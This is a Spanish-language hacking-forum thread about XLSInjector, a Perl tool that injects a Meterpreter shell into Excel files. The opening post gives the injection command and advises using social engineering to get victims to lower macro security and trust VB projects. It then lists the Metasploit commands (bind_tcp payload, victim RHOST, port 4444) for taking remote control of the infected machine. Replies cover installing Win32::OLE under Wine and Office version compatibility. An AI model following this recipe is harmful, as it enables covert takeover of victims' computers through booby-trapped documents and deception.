XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

  • 4 Respuestas
  • 4543 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 261
  • Actividad:
    0%
  • Reputación 2
  • Twitter: _stuxnet
    • Ver Perfil
    • Devel Security

Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * El You are not allowed to view links. Register or Login
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

Código: You are not allowed to view links. Register or Login
perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls
Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

iniciamos la consola del metasploit:

Código: You are not allowed to view links. Register or Login
set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit

You are not allowed to view links. Register or Login

Desconectado T3mpor4lGN

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Buenas comunidad, eh tenido algunas dificultades para poder injectar el codigo al xls, ya que al intentar utilizar los comando descriptos me salta un error diciendome que no se encuentra el modulo Win32::OLE por lo cual consulto es posible instalar este modulo en el perl que se encuentra en KALI LINUX o solo es compatible para las plataformas windows?. el error en cuestion es el siguiente:

Can't locate Win32/OLE.pm in @INC (@INC contains:/etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14 /user/local/lib/site_perl .) at /root/Desktop/Exploitextras/xlsinjector.pl line 3.
BEGIN failed--compilation aborted at /root/Desktop/Exploitextras/xlsinjector.pl
line 3.

eh buscado en google pero no aparece nada concreto sobre el fallo, eh probado el siguiente comando para instalar el modulo Win32::OLE pero sin resultados

perl -MCPAN -e "install Win32::OLE"

comienza la busqueda de paquetes pero no termina en nada.

Cualquier guia o comentario me sirve, si alguien ya pudo usar el xlsinjector.pl para injectar codigo con exito estaria bueno que nos compartiera como fueron los pasos en mas detalle y si le salto algun error como el que les comento. Gracias comunidad saludos.

Desconectado Snifer

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • [email protected]'s
  • Twitter: sniferl4bs
    • Ver Perfil
    • Snifer@L4bs
Es solo compatible para plataformas windows Win32::OLE You are not allowed to view links. Register or Login  la solución ahi te la dan.

Download and install Windows Installer 2.0 Redistributable for Windows 95, 98, and Me Download latest Active State Perl for Windows in .msi format. E.g. ActivePerl-5.8.6.811-MSWin32-x86-122208.msi.

Start installation:

$ /opt/cxoffice/bin/wine "C:~WB~WINDOWS~WB~SYSTEM~WB~msiexec.exe" /i ActivePerl-5.8.6.811-MSWin32-x86-122208.msi

$ /opt/cxoffice/bin/wine "c:\Perl\bin\perl.exe" -v

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado #self

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
esto funciona en cualquier versión de windows y office?

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 294
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
a mi en la version 2013 no me va.... saludos

 

Shell Inversa "Cifrada"

Iniciado por d3adly

Respuestas: 5
Vistas: 323
Último mensaje Hoy a las 02:18:19 pm
por d3adly
Conexion Cliente Servidor [Tool t3c4i3`s Remote Access Shell]

Iniciado por Progresive Death

Respuestas: 1
Vistas: 3305
Último mensaje Mayo 13, 2011, 02:35:37 pm
por schegell cernunnos
Como Escanear Archivos Maliciosos desde el Terminal

Iniciado por qwartz

Respuestas: 8
Vistas: 6027
Último mensaje Abril 05, 2018, 12:25:24 pm
por 79137913
Subiendo Shell desde el Panel de Administracion con Upload de Imagenes

Iniciado por ZanGetsu

Respuestas: 13
Vistas: 9839
Último mensaje Octubre 14, 2013, 10:42:26 pm
por Devilboy
Usando módulos auxiliarys SSH (SECURE SHELL) [1,2] Parte

Iniciado por OswireW0rding

Respuestas: 2
Vistas: 3436
Último mensaje Marzo 12, 2014, 04:33:49 pm
por OswireW0rding